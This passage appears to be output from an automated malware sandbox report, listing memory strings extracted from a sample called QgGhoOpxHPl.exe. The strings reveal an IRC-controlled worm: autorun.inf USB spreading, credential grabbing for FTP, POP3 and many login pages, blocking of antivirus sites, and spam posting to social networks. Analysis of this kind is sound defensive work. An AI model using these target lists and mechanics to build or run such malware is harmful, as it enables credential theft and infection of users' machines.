'%S'webroot.fortinet.virusbuster.nprotect.gdatasoftware.virus.precisesecurity.lavasoft.heck.tcemsisoft.onlinemalwarescanner.onecare.live.f-secure.bullguard.clamav.pandasecurity.sophos.malwarebytes.sunbeltsoftware.norton.norman.mcafee.symanteccomodo.avast.avira.avg.bitdefender.eset.kaspersky.trendmicro.iseclab.virscan.garyshood.viruschief.jotti.threatexpert.novirusthanks.virustotal.ipconfig.exeverclsid.exeregedit.exerundll32.execmd.exeregsvr32.exelogin[password]login[username]*members*.iknowthatgirl*/members*IKnowThatGirl*youporn.*/login*YouPorn*members.brazzers.com*BrazzersclavenumeroTarjeta*clave=**bcointernacional*login*Bcointernacional*:2222/CMD_LOGIN**whcms*dologin**:2086/login**:2083/login**:2082/login**webnames.ru/*user_login*Webnames*dotster.com/*login*Dotsterloginid*enom.com/login*Enomlogin.Passlogin.User*login.Pass=**1and1.com/xml/config*1and1token*moniker.com/*Login*MonikerLoginPasswordLoginUserName*LoginPassword=**namecheap.com/*login*Namecheaploginname*godaddy.com/login*GodaddyPasswordEmailName*Password=**alertpay.com/login*Alertpay*netflix.com/*ogin*Netflix*thepiratebay.org/login*Thepiratebay*torrentleech.org/*login*Torrentleech*vip-file.com/*/signin-do*Vip-filepaslog*pas=**sms4file.com/*/signin-do*Sms4file*letitbit.net*Letitbit*what.cd/login*Whatcd*oron.com/login*Oron*filesonic.com/*login*Filesonic*speedyshare.com/login*Speedysharepwid*pw=**uploaded.to/*login*Uploaded*uploading.com/*login*UploadingloginUserPasswordloginUserName*loginUserPassword=**fileserv.com/login*Fileserve*hotfile.com/login*Hotfile*4shared.com/login*4sharedtxtpasstxtuser*txtpass=**netload.in/index*Netload*freakshare.com/login*Freaksharelogin_pass*login_pass=**mediafire.com/*login*Mediafire*sendspace.com/login*Sendspace*megaupload.*/*login*Mega
            Source: QgGhoOpxHPl.exe, 00000019.00000002.621359929.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: shellexecute=[autorun]
            Source: QgGhoOpxHPl.exe, 00000019.00000002.621359929.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: .lnk%windir%\system32\cmd.exe&&%%windir%%\explorer.exe %%cd%%%s/c "start %%cd%%RECYCLED\%sRECYCLED...inf%s%s*\\.\%c:%S%S\Desktop.ini%s\%s%S%sautorun.tmp%sautorun.inf:\%c:\gdkWindowToplevelClass%0x.execomment-text*bebo.*/c/home/ajax_post_lifestream_commentbebo Lifestream*bebo.*/c/profile/comment_post.jsonbebo CommentMessage*bebo.*/mail/MailCompose.jsp*bebo Message*friendster.*/sendmessage.php*Friendster MessagecommentFriendster Commentshoutout*friendster.*/rpc.phpFriendster Shoutout*vkontakte.ru/mail.phpvkontakte Message*vkontakte.ru/wall.phpvkontakte Wallmessage*vkontakte.ru/api.phpvkontakte Chattext*twitter.*/*direct_messages/new*Twitter Message*twitter.*/*status*/update*Twitter Tweetstatus*facebook.*/ajax/*MessageComposerEndpoint.php*Facebook Messagemsg_text*facebook.*/ajax/chat/send.php*Facebook IM-_.!~*'()+Content-Length: %s.%s hijacked!%s=MSG %d %s %d
            Source: QgGhoOpxHPl.exe, 0000001A.00000002.621684132.0000000000820000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: [autorun]
            Source: QgGhoOpxHPl.exe, 0000001A.00000002.621684132.0000000000820000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exe, 0000001A.00000002.621684132.0000000000820000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: NtFreeVirtualMemoryNtAllocateVirtualMemoryNtQuerySystemInformationLdrEnumerateLoadedModulesNtQueryInformationProcessLdrGetProcedureAddressNtQueryVirtualMemoryLdrLoadDllNtQueryInformationThreadLdrGetDllHandleRtlAnsiStringToUnicodeStringntdll.dll\\.\pipe\%skernel32.dllGetNativeSystemInfo%s_%d%s_0-%sMutexSeDebugPrivilegentdll.dllNtGetNextProcess%s-pid%s-commNtResumeThreadInternet Explorer\iexplore.exePONG JOIN #PRIVMSG #%s.Blocked "%S" from creating "%S"%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!.exeautorun.inf%s.Detected process "%S" sending an IRC packet to server %s:%d.%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).PRIVMSG %255sJOIN %255sPRIVMSGJOINcnc%s:%dpidgin.exewlcomm.exemsnmsgr.exemsmsgs.exeflock.exeopera.exechrome.exeieuser.exeiexplore.exefirefox.exeNtSetInformationProcess&%s.%s%s%S%s%sHKCU\HKLM\%s.%S%S%S%S%SHKCU\HKLM\msn%s_onstate_%soff%s.%s (p='%S')pop3://%s:%s@%s:%dpopgrab%s:%s@%s:%danonymousftp://%s:%s@%s:%dftpgrab%s.%s ->> %s (%s : %s)%s.%s ->> %s : %sDirectadminWHCMSWHMcPanelblog%s-%s-%sffgrabiegrabMicrosoft Unified Security Protocol Provider%s.Blocked possible browser exploit pack call on URL '%s'scrpifcom%s.Blocked possible browser exploit pack call on URL 
'%S'webroot.fortinet.virusbuster.nprotect.gdatasoftware.virus.precisesecurity.lavasoft.heck.tcemsisoft.onlinemalwarescanner.onecare.live.f-secure.bullguard.clamav.pandasecurity.sophos.malwarebytes.sunbeltsoftware.norton.norman.mcafee.symanteccomodo.avast.avira.avg.bitdefender.eset.kaspersky.trendmicro.iseclab.virscan.garyshood.viruschief.jotti.threatexpert.novirusthanks.virustotal.ipconfig.exeverclsid.exeregedit.exerundll32.execmd.exeregsvr32.exelogin[password]login[username]*members*.iknowthatgirl*/members*IKnowThatGirl*youporn.*/login*YouPorn*members.brazzers.com*BrazzersclavenumeroTarjeta*clave=**bcointernacional*login*Bcointernacional*:2222/CMD_LOGIN**whcms*dologin**:2086/login**:2083/login**:2082/login**webnames.ru/*user_login*Webnames*dotster.com/*login*Dotsterloginid*enom.com/login*Enomlogin.Passlogin.User*login.Pass=**1and1.com/xml/config*1and1token*moniker.com/*Login*MonikerLoginPasswordLoginUserName*LoginPassword=**namecheap.com/*login*Namecheaploginname*godaddy.com/login*GodaddyPasswordEmailName*Password=**alertpay.com/login*Alertpay*netflix.com/*ogin*Netflix*thepiratebay.org/login*Thepiratebay*torrentleech.org/*login*Torrentleech*vip-file.com/*/signin-do*Vip-filepaslog*pas=**sms4file.com/*/signin-do*Sms4file*letitbit.net*Letitbit*what.cd/login*Whatcd*oron.com/login*Oron*filesonic.com/*login*Filesonic*speedyshare.com/login*Speedysharepwid*pw=**uploaded.to/*login*Uploaded*uploading.com/*login*UploadingloginUserPasswordloginUserName*loginUserPassword=**fileserv.com/login*Fileserve*hotfile.com/login*Hotfile*4shared.com/login*4sharedtxtpasstxtuser*txtpass=**netload.in/index*Netload*freakshare.com/login*Freaksharelogin_pass*login_pass=**mediafire.com/*login*Mediafire*sendspace.com/login*Sendspace*megaupload.*/*login*Mega
            Source: QgGhoOpxHPl.exe, 0000001A.00000002.621684132.0000000000820000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: shellexecute=[autorun]
            Source: QgGhoOpxHPl.exe, 0000001A.00000002.621684132.0000000000820000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: .lnk%windir%\system32\cmd.exe&&%%windir%%\explorer.exe %%cd%%%s/c "start %%cd%%RECYCLED\%sRECYCLED...inf%s%s*\\.\%c:%S%S\Desktop.ini%s\%s%S%sautorun.tmp%sautorun.inf:\%c:\gdkWindowToplevelClass%0x.execomment-text*bebo.*/c/home/ajax_post_lifestream_commentbebo Lifestream*bebo.*/c/profile/comment_post.jsonbebo CommentMessage*bebo.*/mail/MailCompose.jsp*bebo Message*friendster.*/sendmessage.php*Friendster MessagecommentFriendster Commentshoutout*friendster.*/rpc.phpFriendster Shoutout*vkontakte.ru/mail.phpvkontakte Message*vkontakte.ru/wall.phpvkontakte Wallmessage*vkontakte.ru/api.phpvkontakte Chattext*twitter.*/*direct_messages/new*Twitter Message*twitter.*/*status*/update*Twitter Tweetstatus*facebook.*/ajax/*MessageComposerEndpoint.php*Facebook Messagemsg_text*facebook.*/ajax/chat/send.php*Facebook IM-_.!~*'()+Content-Length: %s.%s hijacked!%s=MSG %d %s %d
            Source: QgGhoOpxHPl.exe, 0000001B.00000002.620411571.0000000000090000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: [autorun]
            Source: QgGhoOpxHPl.exe, 0000001B.00000002.620411571.0000000000090000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exe, 0000001B.00000002.620411571.0000000000090000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: NtFreeVirtualMemoryNtAllocateVirtualMemoryNtQuerySystemInformationLdrEnumerateLoadedModulesNtQueryInformationProcessLdrGetProcedureAddressNtQueryVirtualMemoryLdrLoadDllNtQueryInformationThreadLdrGetDllHandleRtlAnsiStringToUnicodeStringntdll.dll\\.\pipe\%skernel32.dllGetNativeSystemInfo%s_%d%s_0-%sMutexSeDebugPrivilegentdll.dllNtGetNextProcess%s-pid%s-commNtResumeThreadInternet Explorer\iexplore.exePONG JOIN #PRIVMSG #%s.Blocked "%S" from creating "%S"%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!.exeautorun.inf%s.Detected process "%S" sending an IRC packet to server %s:%d.%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).PRIVMSG %255sJOIN %255sPRIVMSGJOINcnc%s:%dpidgin.exewlcomm.exemsnmsgr.exemsmsgs.exeflock.exeopera.exechrome.exeieuser.exeiexplore.exefirefox.exeNtSetInformationProcess&%s.%s%s%S%s%sHKCU\HKLM\%s.%S%S%S%S%SHKCU\HKLM\msn%s_onstate_%soff%s.%s (p='%S')pop3://%s:%s@%s:%dpopgrab%s:%s@%s:%danonymousftp://%s:%s@%s:%dftpgrab%s.%s ->> %s (%s : %s)%s.%s ->> %s : %sDirectadminWHCMSWHMcPanelblog%s-%s-%sffgrabiegrabMicrosoft Unified Security Protocol Provider%s.Blocked possible browser exploit pack call on URL '%s'scrpifcom%s.Blocked possible browser exploit pack call on URL 
'%S'webroot.fortinet.virusbuster.nprotect.gdatasoftware.virus.precisesecurity.lavasoft.heck.tcemsisoft.onlinemalwarescanner.onecare.live.f-secure.bullguard.clamav.pandasecurity.sophos.malwarebytes.sunbeltsoftware.norton.norman.mcafee.symanteccomodo.avast.avira.avg.bitdefender.eset.kaspersky.trendmicro.iseclab.virscan.garyshood.viruschief.jotti.threatexpert.novirusthanks.virustotal.ipconfig.exeverclsid.exeregedit.exerundll32.execmd.exeregsvr32.exelogin[password]login[username]*members*.iknowthatgirl*/members*IKnowThatGirl*youporn.*/login*YouPorn*members.brazzers.com*BrazzersclavenumeroTarjeta*clave=**bcointernacional*login*Bcointernacional*:2222/CMD_LOGIN**whcms*dologin**:2086/login**:2083/login**:2082/login**webnames.ru/*user_login*Webnames*dotster.com/*login*Dotsterloginid*enom.com/login*Enomlogin.Passlogin.User*login.Pass=**1and1.com/xml/config*1and1token*moniker.com/*Login*MonikerLoginPasswordLoginUserName*LoginPassword=**namecheap.com/*login*Namecheaploginname*godaddy.com/login*GodaddyPasswordEmailName*Password=**alertpay.com/login*Alertpay*netflix.com/*ogin*Netflix*thepiratebay.org/login*Thepiratebay*torrentleech.org/*login*Torrentleech*vip-file.com/*/signin-do*Vip-filepaslog*pas=**sms4file.com/*/signin-do*Sms4file*letitbit.net*Letitbit*what.cd/login*Whatcd*oron.com/login*Oron*filesonic.com/*login*Filesonic*speedyshare.com/login*Speedysharepwid*pw=**uploaded.to/*login*Uploaded*uploading.com/*login*UploadingloginUserPasswordloginUserName*loginUserPassword=**fileserv.com/login*Fileserve*hotfile.com/login*Hotfile*4shared.com/login*4sharedtxtpasstxtuser*txtpass=**netload.in/index*Netload*freakshare.com/login*Freaksharelogin_pass*login_pass=**mediafire.com/*login*Mediafire*sendspace.com/login*Sendspace*megaupload.*/*login*Mega
            Source: QgGhoOpxHPl.exe, 0000001B.00000002.620411571.0000000000090000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: shellexecute=[autorun]
            Source: QgGhoOpxHPl.exe, 0000001B.00000002.620411571.0000000000090000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: .lnk%windir%\system32\cmd.exe&&%%windir%%\explorer.exe %%cd%%%s/c "start %%cd%%RECYCLED\%sRECYCLED...inf%s%s*\\.\%c:%S%S\Desktop.ini%s\%s%S%sautorun.tmp%sautorun.inf:\%c:\gdkWindowToplevelClass%0x.execomment-text*bebo.*/c/home/ajax_post_lifestream_commentbebo Lifestream*bebo.*/c/profile/comment_post.jsonbebo CommentMessage*bebo.*/mail/MailCompose.jsp*bebo Message*friendster.*/sendmessage.php*Friendster MessagecommentFriendster Commentshoutout*friendster.*/rpc.phpFriendster Shoutout*vkontakte.ru/mail.phpvkontakte Message*vkontakte.ru/wall.phpvkontakte Wallmessage*vkontakte.ru/api.phpvkontakte Chattext*twitter.*/*direct_messages/new*Twitter Message*twitter.*/*status*/update*Twitter Tweetstatus*facebook.*/ajax/*MessageComposerEndpoint.php*Facebook Messagemsg_text*facebook.*/ajax/chat/send.php*Facebook IM-_.!~*'()+Content-Length: %s.%s hijacked!%s=MSG %d %s %d
            Source: QgGhoOpxHPl.exe, 0000001D.00000002.621517532.00000000005D0000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: [autorun]
            Source: QgGhoOpxHPl.exe, 0000001D.00000002.621517532.00000000005D0000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exe, 0000001D.00000002.621517532.00000000005D0000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: NtFreeVirtualMemoryNtAllocateVirtualMemoryNtQuerySystemInformationLdrEnumerateLoadedModulesNtQueryInformationProcessLdrGetProcedureAddressNtQueryVirtualMemoryLdrLoadDllNtQueryInformationThreadLdrGetDllHandleRtlAnsiStringToUnicodeStringntdll.dll\\.\pipe\%skernel32.dllGetNativeSystemInfo%s_%d%s_0-%sMutexSeDebugPrivilegentdll.dllNtGetNextProcess%s-pid%s-commNtResumeThreadInternet Explorer\iexplore.exePONG JOIN #PRIVMSG #%s.Blocked "%S" from creating "%S"%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!.exeautorun.inf%s.Detected process "%S" sending an IRC packet to server %s:%d.%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).PRIVMSG %255sJOIN %255sPRIVMSGJOINcnc%s:%dpidgin.exewlcomm.exemsnmsgr.exemsmsgs.exeflock.exeopera.exechrome.exeieuser.exeiexplore.exefirefox.exeNtSetInformationProcess&%s.%s%s%S%s%sHKCU\HKLM\%s.%S%S%S%S%SHKCU\HKLM\msn%s_onstate_%soff%s.%s (p='%S')pop3://%s:%s@%s:%dpopgrab%s:%s@%s:%danonymousftp://%s:%s@%s:%dftpgrab%s.%s ->> %s (%s : %s)%s.%s ->> %s : %sDirectadminWHCMSWHMcPanelblog%s-%s-%sffgrabiegrabMicrosoft Unified Security Protocol Provider%s.Blocked possible browser exploit pack call on URL '%s'scrpifcom%s.Blocked possible browser exploit pack call on URL '%S'webroot.fortinet.virusbuster.nprotect.gdatasoftware.virus.precisesecurity.lavasoft.heck.tcemsisoft.onlinemalwarescanner.onecare.live.f-secure.bullguard.clamav.pandasecurity.sophos.malwarebytes.sunbeltsoftware.norton.norman.mcafee.symanteccomodo.avast.avira.avg.bitdefender.eset.kaspersky.trendmicro.iseclab.virscan.garyshood.viruschief.jotti.threatexpert.novirusthanks.virustotal.ipconfig.exeverclsid.exeregedit.exerundll32.execmd.exeregsvr32.exelogin[password]login[username]*members*.iknowthatgirl*/members*IKnowThatGirl*youporn.*/login*YouPorn*members.brazzers.com*BrazzersclavenumeroTarjeta*clave=**bcointernacional*login*Bcointernacional*:2222/CMD_LOGIN**whcms*dologin**:2086/login**:2083/login**:2082/login**webnames.ru/*user_login*Webnames*dotster.com/*login*Dotsterloginid*enom.com/login*Enomlogin.Passlogin.User*login.Pass=**1and1.com/xml/config*1and1token*moniker.com/*Login*MonikerLoginPasswordLoginUserName*LoginPassword=**namecheap.com/*login*Namecheaploginname*godaddy.com/login*GodaddyPasswordEmailName*Password=**alertpay.com/login*Alertpay*netflix.com/*ogin*Netflix*thepiratebay.org/login*Thepiratebay*torrentleech.org/*login*Torrentleech*vip-file.com/*/signin-do*Vip-filepaslog*pas=**sms4file.com/*/signin-do*Sms4file*letitbit.net*Letitbit*what.cd/login*Whatcd*oron.com/login*Oron*filesonic.com/*login*Filesonic*speedyshare.com/login*Speedysharepwid*pw=**uploaded.to/*login*Uploaded*uploading.com/*login*UploadingloginUserPasswordloginUserName*loginUserPassword=**fileserv.com/login*Fileserve*hotfile.com/login*Hotfile*4shared.com/login*4sharedtxtpasstxtuser*txtpass=**netload.in/index*Netload*freakshare.com/login*Freaksharelogin_pass*login_pass=**mediafire.com/*login*Mediafire*sendspace.com/login*Sendspace*megaupload.*/*login*Mega
            Source: QgGhoOpxHPl.exe, 0000001D.00000002.621517532.00000000005D0000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: shellexecute=[autorun]
            Source: QgGhoOpxHPl.exe, 0000001D.00000002.621517532.00000000005D0000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: .lnk%windir%\system32\cmd.exe&&%%windir%%\explorer.exe %%cd%%%s/c "start %%cd%%RECYCLED\%sRECYCLED...inf%s%s*\\.\%c:%S%S\Desktop.ini%s\%s%S%sautorun.tmp%sautorun.inf:\%c:\gdkWindowToplevelClass%0x.execomment-text*bebo.*/c/home/ajax_post_lifestream_commentbebo Lifestream*bebo.*/c/profile/comment_post.jsonbebo CommentMessage*bebo.*/mail/MailCompose.jsp*bebo Message*friendster.*/sendmessage.php*Friendster MessagecommentFriendster Commentshoutout*friendster.*/rpc.phpFriendster Shoutout*vkontakte.ru/mail.phpvkontakte Message*vkontakte.ru/wall.phpvkontakte Wallmessage*vkontakte.ru/api.phpvkontakte Chattext*twitter.*/*direct_messages/new*Twitter Message*twitter.*/*status*/update*Twitter Tweetstatus*facebook.*/ajax/*MessageComposerEndpoint.php*Facebook Messagemsg_text*facebook.*/ajax/chat/send.php*Facebook IM-_.!~*'()+Content-Length: %s.%s hijacked!%s=MSG %d %s %d
            Source: QgGhoOpxHPl.exe | Binary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exe | Binary or memory string: [autorun]
            Source: QgGhoOpxHPl.exe | Binary or memory string: autorun.inf
            Source: QgGhoOpxHPl.exe, 0000001E.00000002.620410172.0000000000090000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: [autorun]
            Source: QgGhoOpxHPl.exe, 0000001E.00000002.620410172.0000000000090000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exe, 0000001E.00000002.620410172.0000000000090000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: NtFreeVirtualMemoryNtAllocateVirtualMemoryNtQuerySystemInformationLdrEnumerateLoadedModulesNtQueryInformationProcessLdrGetProcedureAddressNtQueryVirtualMemoryLdrLoadDllNtQueryInformationThreadLdrGetDllHandleRtlAnsiStringToUnicodeStringntdll.dll\\.\pipe\%skernel32.dllGetNativeSystemInfo%s_%d%s_0-%sMutexSeDebugPrivilegentdll.dllNtGetNextProcess%s-pid%s-commNtResumeThreadInternet Explorer\iexplore.exePONG JOIN #PRIVMSG #%s.Blocked "%S" from creating "%S"%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!.exeautorun.inf%s.Detected process "%S" sending an IRC packet to server %s:%d.%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).PRIVMSG %255sJOIN %255sPRIVMSGJOINcnc%s:%dpidgin.exewlcomm.exemsnmsgr.exemsmsgs.exeflock.exeopera.exechrome.exeieuser.exeiexplore.exefirefox.exeNtSetInformationProcess&%s.%s%s%S%s%sHKCU\HKLM\%s.%S%S%S%S%SHKCU\HKLM\msn%s_onstate_%soff%s.%s (p='%S')pop3://%s:%s@%s:%dpopgrab%s:%s@%s:%danonymousftp://%s:%s@%s:%dftpgrab%s.%s ->> %s (%s : %s)%s.%s ->> %s : %sDirectadminWHCMSWHMcPanelblog%s-%s-%sffgrabiegrabMicrosoft Unified Security Protocol Provider%s.Blocked possible browser exploit pack call on URL '%s'scrpifcom%s.Blocked possible browser exploit pack call on URL '%S'webroot.fortinet.virusbuster.nprotect.gdatasoftware.virus.precisesecurity.lavasoft.heck.tcemsisoft.onlinemalwarescanner.onecare.live.f-secure.bullguard.clamav.pandasecurity.sophos.malwarebytes.sunbeltsoftware.norton.norman.mcafee.symanteccomodo.avast.avira.avg.bitdefender.eset.kaspersky.trendmicro.iseclab.virscan.garyshood.viruschief.jotti.threatexpert.novirusthanks.virustotal.ipconfig.exeverclsid.exeregedit.exerundll32.execmd.exeregsvr32.exelogin[password]login[username]*members*.iknowthatgirl*/members*IKnowThatGirl*youporn.*/login*YouPorn*members.brazzers.com*BrazzersclavenumeroTarjeta*clave=**bcointernacional*login*Bcointernacional*:2222/CMD_LOGIN**whcms*dologin**:2086/login**:2083/login**:2082/login**webnames.ru/*user_login*Webnames*dotster.com/*login*Dotsterloginid*enom.com/login*Enomlogin.Passlogin.User*login.Pass=**1and1.com/xml/config*1and1token*moniker.com/*Login*MonikerLoginPasswordLoginUserName*LoginPassword=**namecheap.com/*login*Namecheaploginname*godaddy.com/login*GodaddyPasswordEmailName*Password=**alertpay.com/login*Alertpay*netflix.com/*ogin*Netflix*thepiratebay.org/login*Thepiratebay*torrentleech.org/*login*Torrentleech*vip-file.com/*/signin-do*Vip-filepaslog*pas=**sms4file.com/*/signin-do*Sms4file*letitbit.net*Letitbit*what.cd/login*Whatcd*oron.com/login*Oron*filesonic.com/*login*Filesonic*speedyshare.com/login*Speedysharepwid*pw=**uploaded.to/*login*Uploaded*uploading.com/*login*UploadingloginUserPasswordloginUserName*loginUserPassword=**fileserv.com/login*Fileserve*hotfile.com/login*Hotfile*4shared.com/login*4sharedtxtpasstxtuser*txtpass=**netload.in/index*Netload*freakshare.com/login*Freaksharelogin_pass*login_pass=**mediafire.com/*login*Mediafire*sendspace.com/login*Sendspace*megaupload.*/*login*Mega
            Source: QgGhoOpxHPl.exe, 0000001E.00000002.620410172.0000000000090000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: shellexecute=[autorun]
            Source: QgGhoOpxHPl.exe, 0000001E.00000002.620410172.0000000000090000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: .lnk%windir%\system32\cmd.exe&&%%windir%%\explorer.exe %%cd%%%s/c "start %%cd%%RECYCLED\%sRECYCLED...inf%s%s*\\.\%c:%S%S\Desktop.ini%s\%s%S%sautorun.tmp%sautorun.inf:\%c:\gdkWindowToplevelClass%0x.execomment-text*bebo.*/c/home/ajax_post_lifestream_commentbebo Lifestream*bebo.*/c/profile/comment_post.jsonbebo CommentMessage*bebo.*/mail/MailCompose.jsp*bebo Message*friendster.*/sendmessage.php*Friendster MessagecommentFriendster Commentshoutout*friendster.*/rpc.phpFriendster Shoutout*vkontakte.ru/mail.phpvkontakte Message*vkontakte.ru/wall.phpvkontakte Wallmessage*vkontakte.ru/api.phpvkontakte Chattext*twitter.*/*direct_messages/new*Twitter Message*twitter.*/*status*/update*Twitter Tweetstatus*facebook.*/ajax/*MessageComposerEndpoint.php*Facebook Messagemsg_text*facebook.*/ajax/chat/send.php*Facebook IM-_.!~*'()+Content-Length: %s.%s hijacked!%s=MSG %d %s %d
            Source: QgGhoOpxHPl.exe | Binary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exe | Binary or memory string: autorun.inf
            Source: QgGhoOpxHPl.exe | Binary or memory string: [autorun]
            Source: QgGhoOpxHPl.exe, 0000001F.00000002.622442633.0000000000910000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: [autorun]
            Source: QgGhoOpxHPl.exe, 0000001F.00000002.622442633.0000000000910000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exe, 0000001F.00000002.622442633.0000000000910000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: NtFreeVirtualMemoryNtAllocateVirtualMemoryNtQuerySystemInformationLdrEnumerateLoadedModulesNtQueryInformationProcessLdrGetProcedureAddressNtQueryVirtualMemoryLdrLoadDllNtQueryInformationThreadLdrGetDllHandleRtlAnsiStringToUnicodeStringntdll.dll\\.\pipe\%skernel32.dllGetNativeSystemInfo%s_%d%s_0-%sMutexSeDebugPrivilegentdll.dllNtGetNextProcess%s-pid%s-commNtResumeThreadInternet Explorer\iexplore.exePONG JOIN #PRIVMSG #%s.Blocked "%S" from creating "%S"%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!.exeautorun.inf%s.Detected process "%S" sending an IRC packet to server %s:%d.%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).PRIVMSG %255sJOIN %255sPRIVMSGJOINcnc%s:%dpidgin.exewlcomm.exemsnmsgr.exemsmsgs.exeflock.exeopera.exechrome.exeieuser.exeiexplore.exefirefox.exeNtSetInformationProcess&%s.%s%s%S%s%sHKCU\HKLM\%s.%S%S%S%S%SHKCU\HKLM\msn%s_onstate_%soff%s.%s (p='%S')pop3://%s:%s@%s:%dpopgrab%s:%s@%s:%danonymousftp://%s:%s@%s:%dftpgrab%s.%s ->> %s (%s : %s)%s.%s ->> %s : %sDirectadminWHCMSWHMcPanelblog%s-%s-%sffgrabiegrabMicrosoft Unified Security Protocol Provider%s.Blocked possible browser exploit pack call on URL '%s'scrpifcom%s.Blocked possible browser exploit pack call on URL '%S'webroot.fortinet.virusbuster.nprotect.gdatasoftware.virus.precisesecurity.lavasoft.heck.tcemsisoft.onlinemalwarescanner.onecare.live.f-secure.bullguard.clamav.pandasecurity.sophos.malwarebytes.sunbeltsoftware.norton.norman.mcafee.symanteccomodo.avast.avira.avg.bitdefender.eset.kaspersky.trendmicro.iseclab.virscan.garyshood.viruschief.jotti.threatexpert.novirusthanks.virustotal.ipconfig.exeverclsid.exeregedit.exerundll32.execmd.exeregsvr32.exelogin[password]login[username]*members*.iknowthatgirl*/members*IKnowThatGirl*youporn.*/login*YouPorn*members.brazzers.com*BrazzersclavenumeroTarjeta*clave=**bcointernacional*login*Bcointernacional*:2222/CMD_LOGIN**whcms*dologin**:2086/login**:2083/login**:2082/login**webnames.ru/*user_login*Webnames*dotster.com/*login*Dotsterloginid*enom.com/login*Enomlogin.Passlogin.User*login.Pass=**1and1.com/xml/config*1and1token*moniker.com/*Login*MonikerLoginPasswordLoginUserName*LoginPassword=**namecheap.com/*login*Namecheaploginname*godaddy.com/login*GodaddyPasswordEmailName*Password=**alertpay.com/login*Alertpay*netflix.com/*ogin*Netflix*thepiratebay.org/login*Thepiratebay*torrentleech.org/*login*Torrentleech*vip-file.com/*/signin-do*Vip-filepaslog*pas=**sms4file.com/*/signin-do*Sms4file*letitbit.net*Letitbit*what.cd/login*Whatcd*oron.com/login*Oron*filesonic.com/*login*Filesonic*speedyshare.com/login*Speedysharepwid*pw=**uploaded.to/*login*Uploaded*uploading.com/*login*UploadingloginUserPasswordloginUserName*loginUserPassword=**fileserv.com/login*Fileserve*hotfile.com/login*Hotfile*4shared.com/login*4sharedtxtpasstxtuser*txtpass=**netload.in/index*Netload*freakshare.com/login*Freaksharelogin_pass*login_pass=**mediafire.com/*login*Mediafire*sendspace.com/login*Sendspace*megaupload.*/*login*Mega
            Source: QgGhoOpxHPl.exe, 0000001F.00000002.622442633.0000000000910000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: shellexecute=[autorun]
            Source: QgGhoOpxHPl.exe, 0000001F.00000002.622442633.0000000000910000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: .lnk%windir%\system32\cmd.exe&&%%windir%%\explorer.exe %%cd%%%s/c "start %%cd%%RECYCLED\%sRECYCLED...inf%s%s*\\.\%c:%S%S\Desktop.ini%s\%s%S%sautorun.tmp%sautorun.inf:\%c:\gdkWindowToplevelClass%0x.execomment-text*bebo.*/c/home/ajax_post_lifestream_commentbebo Lifestream*bebo.*/c/profile/comment_post.jsonbebo CommentMessage*bebo.*/mail/MailCompose.jsp*bebo Message*friendster.*/sendmessage.php*Friendster MessagecommentFriendster Commentshoutout*friendster.*/rpc.phpFriendster Shoutout*vkontakte.ru/mail.phpvkontakte Message*vkontakte.ru/wall.phpvkontakte Wallmessage*vkontakte.ru/api.phpvkontakte Chattext*twitter.*/*direct_messages/new*Twitter Message*twitter.*/*status*/update*Twitter Tweetstatus*facebook.*/ajax/*MessageComposerEndpoint.php*Facebook Messagemsg_text*facebook.*/ajax/chat/send.php*Facebook IM-_.!~*'()+Content-Length: %s.%s hijacked!%s=MSG %d %s %d
            Source: QgGhoOpxHPl.exe | Binary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exe | Binary or memory string: [autorun]
            Source: QgGhoOpxHPl.exe | Binary or memory string: autorun.inf
            Source: QgGhoOpxHPl.exe, 00000020.00000002.621089259.0000000000390000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: [autorun]
            Source: QgGhoOpxHPl.exe, 00000020.00000002.621089259.0000000000390000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: %sautorun.inf
